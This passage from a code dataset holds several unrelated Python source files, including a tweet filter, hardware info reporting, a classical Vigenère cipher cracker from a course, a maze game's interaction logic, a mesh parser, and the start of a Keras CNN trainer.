dataset from tweets which contain\n words form one of the lists generated by this import functions.\n '''\n\n symbols = []\n company_name = []\n\n with open('companies.csv', mode='r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n symbol = row[0]\n name = row[1]\n\n symbols.append((\"$\"+symbol).lower())\n\n #break company names in to single words and filter for stopwords\n word_tokens = word_tokenize(name)\n for w in word_tokens:\n if w not in STOP_WORDS:\n company_name.append(w.lower())\n\n return symbols, company_name\n\n\ndef process_tweet():\n '''\n A lengthy function which filters tweets for relevance based on their\n content. Tweets are determined to be relevant if they contain mention of a\n company name or ticker symbol of a company on the S&P500. Additionall,\n tweets which contain a reference to financial markets as determined by\n keyword filters are included.\n\n This function updates the contents of the mongodb database which it is\n reading tweets from. If the tweet is determined to be relevant it stores a\n processed version of the tweet which has been stripped of stopwords and\n other potentially irrelevant terms. This functionallity is not directly used\n under our lexographic sentiment analysis approach, but might be useful under\n a machine learning sentiment analysis strategy.\n '''\n\n #Connect to the Mongo database\n client = MongoClient('localhost', 27017) #default connection and port\n db = client['tweets'] #connect to raw tweets database\n\n #import sp500 companies as company names and stock ticker symbols with $\n #prepended to ticker symbols to fit expected tweet format\n symbols, company_name = import_companies()\n\n #cf_list and cfe_dict are used to filter out common words that appear is\n #company names (i.e. united or digital)\n cf_list = company_filter.filter_list\n cfe_dict = company_filter_except.filter_dict\n keywords = market_keywords.keywords\n\n #a list which store the a percentage for each user indicateing how many\n #of their tweets are flagged as relevant\n percent_relevant = []\n\n '''Adding twitter specific words to STOP_WORDS set'''\n STOP_WORDS.add(\"rt\")\n\n '''itterate through all contentes of all mongo collections'''\n #itterate through each pre-selected twitter user (whos user names are\n #stored in the file specified by USER_LIST)\n with open(config.user_list) as csv_file:\n user_csv = csv.reader(csv_file, delimiter=',')\n\n #total count of how many tweets are inserted across all users\n total_tweets_processed = 0\n total_tweets_inserted = 0\n\n next(user_csv) #skip the first line of the file which contains lables\n\n for row in user_csv:\n user = row[0]\n print(\"Processing Tweets for @\" + user)\n\n tweets_inserted = 0 #per user count of how many tweets are inserted\n user_tweets_processed = 0 #per user count of how many tweets are processed\n\n collection = db[user] #connect to user's collection in our database\n count = collection.count()\n cursor = collection.find()\n\n #a set of all terms which \"trigger\" a tweet as relevant\n trigger_word_set = set([])\n\n for i in range(0, count):\n doc = cursor.next()\n\n mongo_id = doc['_id']\n text = doc['text'].lower()\n\n #craft a new mongo document with processed_text field\n processed_tweet = {\n \"date\": doc['date'],\n \"id\": doc['id'],\n \"retweet_count\": doc['retweet_count'],\n \"favorite_count\": doc['favorite_count'],\n \"text\": doc['text'],\n \"lang\": doc['lang'],\n \"processed_text\": \"\"\n }\n\n '''clean the tweet by removing any non-printable symbols & urls'''\n cleaned_text = \"\"\n special_word = False #twitter handles or hashtags - indicated by # or @\n\n for c in text:\n if (c == '@') or (c == \"#\"):\n special_word = True\n if (c in string.whitespace):\n special_word = False\n cleaned_text += c\n if (c in string.ascii_lowercase) and (special_word == False):\n cleaned_text += c\n\n '''filter tweets for relevance and remove stopwords'''\n relevant_tweet = False\n processed_text = \"\"\n company_name_token = \"\"\n\n word_tokens = word_tokenize(cleaned_text)\n for w in word_tokens:\n\n #if the tweet contains a company symbol or keyword, it's\n #automatically relevant\n if (w in symbols) or (w in keywords):\n relevant_tweet = True\n trigger_word_set.add(w)\n\n #if the tweet contains a word from our list of words which\n #comprise all company names, we first need to check if the\n #word is not in cfe_dict and not in cf_list\n if (w in company_name):\n if (w not in cf_list) and (w not in cfe_dict): #i.e. not a special case...\n relevant_tweet = True\n trigger_word_set.add(w)\n\n #if the company_name_token is not the empty string, then\n #we know the word we just looked at was in the cfe_dict.\n #We want to check if the current word (w) is the value\n #associated with the key specified by company_name_token\n #in cfe_dict. We perform this check first so that it is\n #not triggered by the initial assignment of\n #company_name_token, and we reset company_name_token\n #after this if statement is triggered.\n if company_name_token != \"\":\n if w in cfe_dict[company_name_token]:\n relevant_tweet = True\n trigger_word_set.add(company_name_token)\n company_name_token = \"\" #reset company_name_token\n\n #if word w is in our dictionary of common company\n #names, which is comprises of only the first words in\n #company names which have multiple words and are\n #unintentionally common (i.e. united, citizens, etc.),\n #we want to verify that the next word (if there is a\n #next word) is also part of the same company name.\n if w in cfe_dict:\n company_name_token += w\n\n if (w not in STOP_WORDS) and (\"http\" not in w) and\\\n (w not in trigger_word_set):\n processed_text += w + \" \"\n\n '''update processed_text field if tweet is relevant/passes our filters'''\n if relevant_tweet == True:\n processed_tweet[\"processed_text\"] = processed_text\n tweets_inserted += 1\n total_tweets_inserted += 1\n\n update_result = collection.replace_one(filter=doc, replacement=processed_tweet)\n\n user_tweets_processed += 1\n total_tweets_processed += 1\n\n '''Printing \"success\" rate'''\n print(\"Tweets processed: \" + str(user_tweets_processed) + \\\n \" Tweets inserted: \" + str(tweets_inserted) +\\\n \" %\" + str((tweets_inserted/user_tweets_processed)*100))\n\n #add to our list of user relevance percentages\n percent_relevant.append((tweets_inserted/user_tweets_processed)*100)\n\n store_relevance(percent_relevant)\n\n return total_tweets_processed, total_tweets_inserted\n\n\ndef store_relevance(percent_relevant):\n '''\n A simple helper function that will store data regarding the amount of tweets\n which were flagged as relevant for each user. The file that is output will\n be used in the generation of visualizations in generateVisualization.py\n '''\n\n with open('per_user_relevance.csv', 'w', newline='') as out_file:\n writer = csv.writer(out_file)\n\n with open(config.user_list) as in_file:\n reader = csv.reader(in_file, delimiter=',')\n next(reader) #skip the first line of the file which contains lables\n\n #itterate throught the user list and store their username along\n #with relevance percentage our writer csv\n i = 0\n for row in reader:\n user = row[0]\n percent = percent_relevant[i]\n writer.writerow([user, percent])\n i += 1\n\n\n\ndef main():\n # Process tweets\n total_tweets_processed, total_tweets_inserted = process_tweet()\n print(\"Total tweets processed: \" + str(total_tweets_processed))\n print(\"Total tweets inserted: \"+ str(total_tweets_inserted))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"cmboswell/AIM","sub_path":"processTweet.py","file_name":"processTweet.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"16157920629","text":"from ._device import get_processor_name, get_num_cpu_threads, get_gpu_name, \\\n get_num_gpu_devices, get_nvidia_driver_version\nfrom ._memory import Memory\nfrom ._cuda import locate_cuda\nfrom ..__version__ import __version__\n\n__all__ = ['info']\n\n\n# ====\n# info\n# ====\n\ndef info(print_only=True):\n \"\"\"\n Provides general information about hardware device, package version, and\n memory usage.\n\n Parameters\n ----------\n\n print_only : bool, default=True\n It `True`, it prints the output. If `False`, it returns the output as\n a dictionary.\n\n Returns\n -------\n\n info_dict : dict\n (Only if ``print_only`` is `False`). A dictionary with the following\n keys:\n\n * ``imate_version``: `str`, the version of the imate package in the\n format ``\"major_version.minor_version.patch_number\"``.\n * ``processor``: `str`, the model name of the CPU processor.\n * ``num_threads``, `int`, number of CPU threads that are available and\n allocated to the user.\n * ``gpu_name``: `str`, model name of the GPU devices.\n * ``num_gpu_devices``: `int`, number of GPU devices in multi-GPU\n platforms.\n * ``cuda_version``: `str`, the version of CUDA Toolkit installed on the\n machine in the format ``\"major_version.minor_version.patch_number\"``.\n * ``nvidia_driver``: `str`, the version of NVIDIA graphic driver.\n * ``mem_used``: `int`, resident memory usage for the current Python\n process.\n * ``mem_unit``, `str`, the unit in which ``mem_used`` is reported. This\n can be ``\"b\"`` for Byte, ``\"KB\"`` for Kilo-Byte, ``\"MB\"`` for\n Mega-Byte, ``\"GB\"`` for Giga-Byte, and ``\"TB\"`` for Tera-Byte.\n\n See Also\n --------\n\n imate.device.get_processor_name\n imate.device.get_gpu_name\n imate.device.get_num_cpu_threads\n imate.device.get_num_gpu_devices\n imate.device.get_nvidia_driver_version\n imate.Memory\n imate.device.locate_cuda\n\n Notes\n -----\n\n **CUDA Version:**\n\n In order to find CUDA Toolkit information properly, either of the\n environment variables ``CUDA_HOME``, ``CUDA_ROOT``, or ``CUDA_PATH`` should\n be set to the directory where CUDA Toolkit is installed. Usually on UNIX\n operating systems, this path is ``/usr/local/cuda``. In this case, set\n ``CUDA_HOME`` (or any of the other variables mentioned in the above) as\n follows:\n\n ::\n\n export CUDA_HOME=/usr/local/cuda\n\n To permanently set this variable, place the above line in ``profile`` file,\n such as in ``~/.bashrc``, or ``~/.profile``, and source this file, for\n instance by\n\n ::\n\n source ~/.bashrc\n\n If no CUDA Toolkit is installed, then the key ``cuda_version`` shows\n `not found`.\n\n .. note::\n\n It is possible that the CUDA Toolkit is installed on the machine, but\n ``cuda_version`` key shows `not found`. This is because the user did\n not set the environment variables mentioned in the above.\n\n **GPU Devices:**\n\n If the key ``gpu_name`` shows `not found`, this is because either\n\n * No GPU device is detected on the machine.\n * GPU device exists, but NVIDIA graphic driver is not installed. See\n :ref:`Install NVIDIA Graphic Driver ` for further\n details.\n * NVIDIA graphic driver is installed, but the executable ``nvidia-smi`` is\n not available on the `PATH``. To fix this, set the location of the\n ``nvidia-smi`` executable on the ``PATH`` variable.\n\n **Memory:**\n\n The key ``mem_used`` shows the resident set size memory (RSS) on RAM\n hardware. The unit of the reported memory size can be found in\n ``mem_unit``, which can be ``b`` for Bytes, ``KB`` for Kilo-Bytes, ``MB``\n for Mega-Bytes, and so on.\n\n Examples\n --------\n\n Print information:\n\n .. code-block:: python\n\n >>> from imate import info\n >>> info()\n imate version : 0.13.0\n processor : Intel(R) Xeon(R) CPU E5-2623 v3 @ 3.00GHz\n num threads : 8\n gpu device : 'GeForce GTX 1080 Ti'\n num gpu devices : 4\n cuda version : 11.2.0\n nvidia driver : 460.84\n process memory : 1.7 (Gb)\n\n Return information as a dictionary:\n\n .. code-block:: python\n\n >>> from imate import info\n >>> info_dict = info(print_only=False)\n\n >>> # Neatly print dictionary using pprint\n >>> from pprint import pprint\n >>> pprint(info_dict)\n {\n 'imate version': 0.13.0,\n 'processor': Intel(R) Xeon(R) CPU E5-2623 v3 @ 3.00GHz,\n 'num threads': 8,\n 'gpu device': 'GeForce GTX 1080 Ti',\n 'num gpu devices': 4,\n 'cuda version': 11.2.0,\n 'nvidia driver': 460.84,\n 'process memory': 1.7 (Gb)\n }\n \"\"\"\n\n mem_used, mem_unit = Memory.get_resident_memory(human_readable=True)\n\n # Get cuda version\n cuda = locate_cuda()\n if cuda != {}:\n cuda_version = cuda['version']\n cuda_version_ = '%d.%d.%d' \\\n % (cuda_version['major'], cuda_version['minor'],\n cuda_version['patch'])\n else:\n cuda_version_ = 'not found'\n\n # NVIDIA driver version\n nvidia_driver = get_nvidia_driver_version()\n\n info_ = {\n 'imate_version': __version__,\n 'processor_name': get_processor_name(),\n 'num_cpu_threads': get_num_cpu_threads(),\n 'gpu_name': get_gpu_name(),\n 'num_gpu_devices': get_num_gpu_devices(),\n 'mem_used': mem_used,\n 'mem_unit': mem_unit,\n 'cuda_version': cuda_version_,\n 'nvidia_driver': nvidia_driver,\n }\n\n # Print\n if print_only:\n print('')\n print('imate version : %s' % info_['imate_version'])\n print('processor : %s' % info_['processor_name'])\n print('num threads : %d' % info_['num_cpu_threads'])\n print('gpu device : %s' % info_['gpu_name'])\n print('num gpu devices : %d' % info_['num_gpu_devices'])\n print('cuda version : %s' % info_['cuda_version'])\n print('nvidia driver : %s' % info_['nvidia_driver'])\n print('process memory : %0.1f (%s)'\n % (info_['mem_used'], info_['mem_unit']))\n print('')\n else:\n return info_\n","repo_name":"ameli/imate","sub_path":"imate/device/_info.py","file_name":"_info.py","file_ext":"py","file_size_in_byte":6339,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"23931275420","text":"import sys\n\nfname = sys.argv[1]\ncipher = open(fname).read()\n\nrate = {\n 'A': 0.082,\n 'B': 0.015,\n 'C': 0.028,\n 'D': 0.043,\n 'E': 0.127,\n 'F': 0.022,\n 'G': 0.020,\n 'H': 0.061,\n 'I': 0.070,\n 'J': 0.002,\n 'K': 0.008,\n 'L': 0.040,\n 'M': 0.024,\n 'N': 0.067,\n 'O': 0.075,\n 'P': 0.019,\n 'Q': 0.001,\n 'R': 0.060,\n 'S': 0.063,\n 'T': 0.091,\n 'U': 0.028,\n 'V': 0.010,\n 'W': 0.023,\n 'X': 0.001,\n 'Y': 0.020,\n 'Z': 0.001,\n}\n\ndef group(c, length):\n res = [[] for _ in range(length)]\n for i in range(len(c)):\n res[i % length].append(c[i].upper())\n\n return res\n\n\ndef calc_CI(c, length):\n res = []\n for cipher_t in group(c, length):\n tmp = 0.0\n for alpha in rate.keys():\n alpha_c = cipher_t.count(alpha)\n tmp += alpha_c * (alpha_c - 1)\n\n res.append(tmp / (len(cipher_t) * (len(cipher_t) - 1)))\n return sum(res) / len(res)\n\n\nCIs = []\nfor i in range(1, 64):\n CIs.append((i, calc_CI(cipher, i)))\n\nCIs.sort(key=lambda x: abs(x[1] - 0.065))\nk_len = [x[0] for x in CIs]\n\nfor length in k_len:\n output = []\n for cipher_t in group(cipher, length):\n t = {ord(a): cipher_t.count(a) for a in rate.keys()}\n\n res = {}\n for offset in range(26):\n tmp = 0\n for a in t.keys():\n tmp += t[a] * rate[chr((\n (a - 65 + offset) % 26) + 65)]\n res[offset] = tmp\n \n res = sorted(res.items(), key=lambda x: abs(x[1] - 0.065))\n output.append(chr((21 - res[0][0]) % 26 + ord('A')))\n key = ''.join(output)\n\n print(f'KEY_LENGTH={length} -> {key}')\n","repo_name":"EddieIvan01/cryptography-course","sub_path":"classical/crack.py","file_name":"crack.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41336775239","text":"# validate.py - Contains validation checks.\n\n# Import standard library helpers.\nimport unicodedata\n\ndef normalize_nfkd(s):\n \"\"\"Perform NFKD normalization on an input string.\n\n :param s: String to normalize.\n :return: Returns normalized string.\n \"\"\" \n return unicodedata.normalize(\"NFKD\", s)\n\n\ndef caseless_compare(a, b):\n \"\"\"Given two strings, perform a caseless comparison between them.\n\n :param a: Left-hand string.\n :param b: Right-hand string.\n :returns: Returns 0 if equal. Returns 1 if the normalized a > b, alphabetically. Otherwise, returns -1.\n \"\"\" \n if a is None or b is None:\n raise ValueError(\"Cannot compare to None-type argument.\")\n \n # Will fail if either is not a string.\n norm_a = normalize_nfkd(a.casefold())\n norm_b = normalize_nfkd(b.casefold())\n \n if norm_a == norm_b:\n return 0\n elif norm_a > norm_b:\n return 1\n elif norm_a < norm_b:\n return -1\n\n\ndef is_empty(s):\n \"\"\"Check if input string or iterable is empty. \n \n :param s: String or iterable to check.\n :return: True if input is empty.\n \"\"\"\n if s:\n return False\n else:\n return True\n\n\ndef is_whitespace(s):\n \"\"\"Check if input string is empty or contains only whitespace.\n \n :param s: String to check.\n :return: True if input is only whitespace.\n \"\"\"\n return is_empty(\"\".join(s.strip()))\n\n\ndef is_numeric(s):\n \"\"\"Check if input string is a numeric.\n \n :param s: String to check.\n :return: True if input is a numeric. False if empty or not a numeric.\n \"\"\"\n try:\n int(s)\n return True\n except (TypeError, ValueError):\n return False\n","repo_name":"rimij405/dsci-623_midterm","sub_path":"src/analysis/utils/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7734702026","text":"def lis(a,n):\n i,j,maxm = 0,0,0\n\n lst = [1 for s in range(n)]\n for i in range(n):\n for j in range(0,i):\n if a[i]>a[j] and lst[i]string callable object that converts a local-tag\n name to a namespace-qualified QName\n \n returns a dictionay with entries:\n points : (N,3) array of point coordinates\n triangles: (K,3) array of indices, each index in range(N)\n \"\"\"\n from numpy import array, float_, int_\n assert( meshNode.tag == ns('mesh') )\n \n retVal = dict()\n coordinates = list()\n vs = meshNode.find( ns('vertices'))\n if vs is None:\n raise ValueError(\"No vertices element found for mesh\")\n for pnode in vs.findall( ns('vertex')):\n p = tuple([float( pnode.get(cn)) for cn in ('x','y','z')])\n coordinates.append(p)\n retVal['points'] = array( coordinates )\n \n indices = list()\n ts = meshNode.find( ns('triangles'))\n if ts is None:\n raise ValueError(\"Mesh triangles not found\")\n \n for tnode in ts.findall( ns('triangle')):\n t = tuple([int( tnode.get(jn)) for jn in ('v1','v2','v3')])\n indices.append(t)\n retVal['triangles'] = array(indices)\n \n return retVal\n\n \n","repo_name":"vincentmarchetti/x3d_3mf_conversions","sub_path":"convert_3mf_to_x3d/mesh.py","file_name":"mesh.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"5524737819","text":"\"\"\"Player interactions.\"\"\"\n\nimport dataclasses\nimport enum\nimport itertools\nfrom typing import Optional, Sequence, Set, Tuple, Union\nfrom . import play_objects\nfrom . import walls\n\nSpeed = Tuple[int, int]\nSquaresType = Union[Set[Tuple[int, int]], 'Squares']\n_DEFAULT_INFLATION = (100, 100)\n\n\nclass ItemEffectType(enum.Enum):\n REMOVE = enum.auto()\n ADD = enum.auto()\n\n\nclass ObjectEffectType(enum.Enum):\n REMOVE = enum.auto()\n ADD = enum.auto()\n HIDE = enum.auto()\n\n\nclass StateEffectType(enum.Enum):\n REMOVE = enum.auto()\n\n\n@dataclasses.dataclass\nclass Effect:\n type: Union[ItemEffectType, ObjectEffectType, StateEffectType]\n target: str\n\n @classmethod\n def remove_item(cls, item):\n return cls(ItemEffectType.REMOVE, item)\n\n @classmethod\n def add_item(cls, item):\n return cls(ItemEffectType.ADD, item)\n\n @classmethod\n def remove_object(cls, obj):\n return cls(ObjectEffectType.REMOVE, obj)\n\n @classmethod\n def add_object(cls, obj):\n return cls(ObjectEffectType.ADD, obj)\n\n @classmethod\n def hide_object(cls, obj):\n return cls(ObjectEffectType.HIDE, obj)\n\n @classmethod\n def remove_state(cls, state):\n return cls(StateEffectType.REMOVE, state)\n\n\n@dataclasses.dataclass\nclass Collision:\n reason: str\n max_nocollision_speed: Optional[Speed]\n play_area_effects: Sequence[Effect] = ()\n\n def closer_than(self, speed):\n # See play_area.Surface._check_player_collision. When two possible\n # collisions are in the same direction, the closer one is the one for\n # which the maximum speed that avoids collision is less.\n if self.max_nocollision_speed and speed:\n return abs(sum(self.max_nocollision_speed)) < abs(sum(speed))\n elif speed:\n return True\n else:\n return False\n\n\n@dataclasses.dataclass\nclass Item:\n reason: str\n item_effects: Sequence[Effect] = ()\n play_area_effects: Sequence[Effect] = ()\n\n\n@dataclasses.dataclass\nclass Use:\n reason: str\n activator: Tuple[str, ...]\n item_effects: Sequence[Effect] = ()\n play_area_effects: Sequence[Effect] = ()\n\n\nclass Squares(enum.Enum):\n DEFAULT = enum.auto()\n ALL = enum.auto()\n\n\n@dataclasses.dataclass\nclass _Config:\n # Which squares a player has to be in to interact with an object.\n squares: SquaresType = Squares.DEFAULT\n # How much to inflate the object size when determining whether the player is\n # close enough to interact with it.\n inflation: Tuple[int, int] = _DEFAULT_INFLATION\n\n\n_Config.DEFAULT = _Config()\n\n\ndef _collision(name) -> Union[str, Tuple[str, Sequence[Effect]]]:\n if walls.match(name) or walls.partial_match(name):\n return \"That's a wall...\"\n elif name == 'house':\n return \"You don't want to go back in the house.\"\n elif name.startswith('flowers_'):\n return 'The sweet scent of wildflowers makes your nose itch.'\n elif name.startswith('tree_'):\n return 'The tree leaves rustle gently in the breeze.'\n elif name == 'key':\n return \"It's some sort of key.\"\n elif name == 'gate':\n return \"There's a gate here, but it's locked.\"\n elif name.startswith('open_gate_'):\n return 'You walk into the gate. Ouch.'\n elif name.startswith('block_'):\n return 'An oversized alphabet block. How curious.'\n elif name == 'billboard_2':\n return 'It\\'s a billboard. It says, \"Go up.\"'\n elif name == 'billboard_3':\n return '\"Seriously, go up.\"'\n elif name == 'billboard_4':\n return ('\"Roses are red, violets are blue. My billboards are lies, '\n 'did I fool you?\"')\n elif name == 'bunny_prints':\n return 'What are these tracks?'\n elif name == 'bunny':\n return 'A bunny! Your heart melts.'\n elif name == 'eggplant':\n return 'An eggplant. Ew.'\n elif name == 'trash_can':\n return 'Do you have the eggplant?'\n elif name == 'fishing_rod':\n return 'Who left a fishing rod here?'\n elif name == 'lake':\n return 'What a lovely calm lake.'\n elif name == 'angry_cat':\n return 'Your way is blocked by an angry cat.'\n elif name == 'happy_cat':\n return 'The well-fed cat purrs when you pet it.'\n elif name == 'cake':\n return 'A huge chocolate cake!'\n elif name == 'invisible_wall':\n return ('Thinking of the cake, you suddenly crave something sweet.',\n (Effect.remove_state('pre_crave'),))\n elif name == 'bucket':\n return 'You wonder why random stuff is scattered all over the place.'\n elif name == 'matches':\n return 'Ooh, matches.'\n elif name == 'doll':\n return \"It's a worn cloth doll with button eyes and yarn hair.\"\n elif name == 'shrubbery':\n return 'Your way is blocked by a shrubbery.'\n elif name == 'fire':\n return 'Your way is blocked by a flaming shrubbery.'\n elif name == 'hole':\n return \"It's a hole in the ground.\"\n elif name == 'billboard_16':\n return '\"Go down.\"'\n elif name == 'billboard_10':\n return ('\"Roses are red, violets are blue. Believe it or not, I '\n 'sometimes tell the truth =P\"')\n elif name.startswith('puzzle_') or name.startswith('slotted_block_'):\n return 'This wall looks unusual.'\n else:\n raise NotImplementedError(f'Collided with {name}')\n\n\ndef collide(name, speed) -> Collision:\n result: Union[str, Tuple[str, Sequence[Effect]]] = _collision(name)\n if isinstance(result, str):\n return Collision(result, speed)\n else:\n reason, effects = result\n return Collision(reason, speed, effects)\n\n\ndef _simple_obtain_effects(name):\n return [(Effect.add_item(name),), (Effect.remove_object(name),)]\n\n\ndef obtain(name) -> Optional[Item]:\n if name in (f'tree_{fruit}' for fruit in play_objects.FRUITS):\n fruit = name[len('tree_'):]\n return Item(f'You pick a ripe {fruit}.', (Effect.add_item(fruit),))\n elif name == 'key':\n return Item('You pick up the key.', *_simple_obtain_effects(name))\n elif name.startswith('block_'):\n return Item(\n 'You decide to carry the giant wooden block around with you.',\n *_simple_obtain_effects(name))\n elif name == 'eggplant':\n return Item('You gingerly pick up the disgusting vegetable.',\n *_simple_obtain_effects(name))\n elif name == 'fishing_rod':\n return Item(\"You steal someone's fishing rod.\",\n *_simple_obtain_effects(name))\n elif name == 'cake':\n return Item('On closer inspection, the cake is made of styrofoam.')\n elif name == 'bucket':\n return Item('Finders keepers, right?', *_simple_obtain_effects(name))\n elif name == 'matches':\n return Item('You never know what you may want to set on fire.',\n *_simple_obtain_effects(name))\n elif name == 'hole':\n return Item(\n 'You fall into the hole and climb back out. You feel foolish.')\n elif name.startswith('slotted_block_'):\n block_char = name[len('slotted_block_')]\n slot_char = name[-1]\n return Item('You pry the block back out of the wall slot.',\n (Effect.add_item(f'block_{block_char}'),),\n (Effect.hide_object(name),\n Effect.add_object(f'puzzle_slot_{slot_char}')))\n else:\n return None\n\n\ndef _use_block(block_char, slot_char):\n block = f'block_{block_char}'\n slot = f'puzzle_slot_{slot_char}'\n slotted_block = f'slotted_{block}_in_{slot_char}'\n activator = (slot,)\n item_effects = (Effect.remove_item(block),)\n play_area_effects = (Effect.hide_object(slot),\n Effect.add_object(slotted_block))\n if block_char == slot_char:\n solver = activator + ('puzzle_door',) + tuple(\n f'slotted_block_{char}_in_{char}'\n for char in 'LOVE' if char != block_char)\n yield Use(\n 'As you slot the block in, you hear a rumbling sound. The middle '\n 'of the wall sinks into the ground.', solver, item_effects,\n play_area_effects + (Effect.remove_object('puzzle_door'),))\n yield Use('The block fits perfectly in this slot in the wall.', activator,\n item_effects, play_area_effects)\n\n\ndef use(name) -> Sequence[Use]:\n if name in play_objects.FRUITS:\n item_effects = (Effect.remove_item(name),)\n reason = f'You eat the {name}. '\n return [Use(reason + 'Yum.', ('pre_crave',), item_effects),\n Use(reason + 'Your sweet craving is satisfied.',\n ('invisible_wall',), item_effects,\n (Effect.remove_object('invisible_wall'),)),\n Use(reason + 'You feel bloated.', (), item_effects)]\n elif name == 'key':\n play_area_effects = (Effect.remove_object('gate'),\n Effect.add_object('open_gate_left'),\n Effect.add_object('open_gate_right'))\n return [Use('You unlock the gate.', ('gate',),\n (Effect.remove_item('key'),), play_area_effects)]\n elif name.startswith('block_'):\n block_char = name[len('block_'):]\n uses = []\n for slot_char in 'LOVE':\n uses.extend(_use_block(block_char, slot_char))\n return uses\n elif name == 'eggplant':\n return [\n Use('You feed the cat the eggplant. The cat is even angrier now.',\n ('angry_cat',), (Effect.remove_item('eggplant'),)),\n Use(\"Yeah, you don't need that.\", ('trash_can',),\n (Effect.remove_item('eggplant'),))]\n elif name == 'fishing_rod':\n item_effects = (Effect.remove_item('fishing_rod'),\n Effect.add_item('fish'))\n return [Use(\"You catch a tasty-looking fish.\", ('lake',), item_effects)]\n elif name == 'fish':\n play_area_effects = (Effect.remove_object('angry_cat'),\n Effect.add_object('happy_cat'))\n return [\n Use('You feed the cat the fish. The cat is happy.', ('angry_cat',),\n (Effect.remove_item('fish'),), play_area_effects)]\n elif name == 'bucket':\n item_effects = (Effect.remove_item('bucket'),\n Effect.add_item('filled_bucket'))\n return [Use('You fill the bucket with lake water.', ('lake',),\n item_effects)]\n elif name == 'filled_bucket':\n play_area_effects = (Effect.remove_object('shrubbery'),\n Effect.remove_object('fire'))\n return [Use('You put out the fire. The shrubbery has been burned down.',\n ('fire',), (Effect.remove_item('filled_bucket'),),\n play_area_effects)]\n elif name == 'matches':\n return [\n Use('You burn the well-loved doll to ashes. You monster.',\n ('doll',), play_area_effects=(Effect.remove_object('doll'),)),\n Use('Your way is now blocked by a flaming shrubbery.',\n ('shrubbery',), (Effect.remove_item('matches'),),\n (Effect.add_object('fire'),))]\n else:\n raise NotImplementedError(f'Used {name}')\n\n\n_CUSTOM_CONFIG = {\n 'tree_peach': _Config(squares={(0, 0), (-1, 0), (-1, 1)}),\n 'fishing_rod': _Config(squares={(1, 2), (1, 3)}),\n 'cake': _Config(squares={(2, 1), (3, 1)}),\n 'invisible_wall': _Config(squares=Squares.ALL),\n 'shrubbery': _Config(squares={(3, 1), (4, 1)}),\n 'fire': _Config(squares={(3, 1), (4, 1)}),\n 'puzzle_door': _Config(squares={(2, 3), (2, 4)}, inflation=(360, 175)),\n 'puzzle_slot_L': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_O': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_V': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n 'puzzle_slot_E': _Config(squares={(2, 3), (2, 4)}, inflation=(-40, 100)),\n}\n\n\nfor block_char, slot_char in itertools.product('LOVE', repeat=2):\n inflate_x = 840 if slot_char in 'LE' else 600\n _CUSTOM_CONFIG[f'slotted_block_{block_char}_in_{slot_char}'] = _Config(\n squares={(2, 3), (2, 4)}, inflation=(inflate_x, 100))\ndel block_char, slot_char, inflate_x\n\n\ndef config(name, attr):\n return getattr(_CUSTOM_CONFIG.get(name, _Config.DEFAULT), attr)\n","repo_name":"rchen152/maze","sub_path":"src/maze/interactions.py","file_name":"interactions.py","file_ext":"py","file_size_in_byte":12343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"21546684642","text":"# i = 1\n# while i <= 10:\n# print(i, end=' | ')\n# i +=1 # Тоже самое i = i + 1\n\n# sep=\"\" : Строка, которой следует разделить объекты. None — использовать значение по умолчанию. Ожидается, что аргумент будет передан по имени.\n# end=\\n : Строка, которой следует поставить после всех объектов. None — использовать значение по умолчанию. Ожидается, что аргумент будет передан по имени.\n\n# print('Hello', 'World', sep=' ', end=' ')\n# print('Hello2', 'World2')\n\n# s = 'Hello world'\n# for l in s:\n# if l == ' ':\n# continue\n# print(f'\"{l}\"', end=' ')\n\nfor i in 'Hello world':\n if i == ' ':\n break\n print(i, end=' ')\nelse:\n print('\\nНет пробелов')\n\n","repo_name":"Oshpara/Python2","sub_path":"lesson13.py","file_name":"lesson13.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"39245711807","text":"from keras.models import Sequential\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras import backend as K\nimport image_tools\nfrom scipy import misc\nimport os\nimport logger\n\ndef create_model(input_shape):\n model = Sequential()\n model.add(Conv2D(32, (3, 3), input_shape=input_shape))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Conv2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(64))\n model.add(Activation('relu'))\n model.add(Dropout(0.1))\n model.add(Dense(1))\n model.add(Activation('sigmoid'))\n return model\n\n#binary_crossentropy\ndef TrainNN(train_data_dir, validation_data_dir, model_name, img_width = 150, img_height = 150,nb_train_samples = 1000,nb_validation_samples = 300,\n epochs = 35,batch_size = 10):\n img_width, img_height = img_width, img_height\n train_data_dir = train_data_dir\n validation_data_dir = validation_data_dir\n nb_train_samples = nb_train_samples\n nb_validation_samples = nb_validation_samples\n epochs = epochs\n batch_size = batch_size\n\n if K.image_data_format() == 